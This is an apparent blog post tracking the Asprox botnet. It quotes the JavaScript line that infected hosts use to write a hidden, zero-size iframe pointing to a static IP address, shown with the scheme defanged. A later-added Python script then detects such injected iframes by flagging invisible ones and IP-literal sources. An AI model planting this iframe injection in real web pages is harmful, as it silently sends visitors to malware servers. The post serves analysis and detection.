Speculations around Asprox

Asprox, Trojan.Wsnpoem, RBN, abuse.ch, DDoS?

A few days ago I wrote that the JavaScript files on the Asprox botnet were now pointing to a static IP instead of infected PCs on the botnet. Or more correctly: the content of the webpage hosted by the infected PCs on the Asprox botnet is an iframe from 91.203.93.4, inserted via JavaScript like this:

document.write("<iframe src=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");

I have followed this over the last few days, only manually; I don't have the tools or the knowledge to automate this.
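
A static check for the injection pattern shown above, added here as an example and not part of the original post: it pulls iframes out of document.write calls and reports whether each one is invisible and whether its source is a bare IP address. The function names, the TINY size set and the benign sample are assumptions made for the example.

```python
import ipaddress
import re

# document.write("...") or document.writeln('...'); group 2 is the string literal body.
WRITE_RE = re.compile(r"""document\.write(?:ln)?\(\s*(["'])((?:\\.|(?!\1).)*)\1\s*\)""", re.S | re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# name=value where the value is double-quoted, single-quoted or bare (as in the post).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Scheme may be defanged (h||p, hxxp); capture only the host part.
HOST_RE = re.compile(r"^[a-z|]+://([^/:?#\s]+)", re.I)
TINY = {"0", "1", "0px", "1px"}  # assumption: sizes treated as invisible


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_injected_iframes(js_source):
    """Return one finding per <iframe> written into the page by document.write."""
    findings = []
    for write in WRITE_RE.finditer(js_source):
        markup = re.sub(r"\\(.)", r"\1", write.group(2))  # undo \" and \' escapes
        for tag in IFRAME_RE.finditer(markup):
            attrs = {a.group(1).lower(): a.group(2) or a.group(3) or a.group(4) or ""
                     for a in ATTR_RE.finditer(tag.group(1))}
            src = attrs.get("src", "")
            host_match = HOST_RE.match(src)
            host = host_match.group(1) if host_match else ""
            style = attrs.get("style", "").replace(" ", "").lower()
            hidden = ((attrs.get("width") in TINY and attrs.get("height") in TINY)
                      or "display:none" in style or "visibility:hidden" in style)
            findings.append({"src": src, "host": host, "hidden": hidden,
                             "ip_literal": is_ip_literal(host)})
    return findings


# Script from the post (defanged as published) plus a constructed benign embed.
POST_SAMPLE = 'document.write("<iframe src=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");'
BENIGN_SAMPLE = "document.write('<iframe src=\"https://video.example.com/embed/1\" width=\"640\" height=\"360\"></iframe>');"

if __name__ == "__main__":
    for sample in (POST_SAMPLE, BENIGN_SAMPLE):
        for f in find_injected_iframes(sample):
            verdict = "SUSPICIOUS" if f["hidden"] else "ok"
            print(verdict, f)
```

Because the check only reads the script text, it can be run over saved copies of the JavaScript files without rendering them in a browser.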
